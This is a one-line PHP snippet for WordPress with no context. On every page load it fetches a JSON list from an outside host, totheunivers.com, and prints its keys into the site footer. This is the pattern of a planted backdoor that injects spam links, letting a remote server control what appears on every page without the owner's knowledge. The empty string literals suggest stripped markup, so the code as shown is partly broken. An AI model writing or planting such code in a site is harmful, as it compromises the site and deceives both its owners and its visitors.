add_action('wp_footer', function() { $a = json_decode(file_get_contents('https://totheunivers.com/grup1/')); if (is_array($a) || is_object($a)) { foreach($a as $key => $val){ echo ''.esc_html($key).''; } } });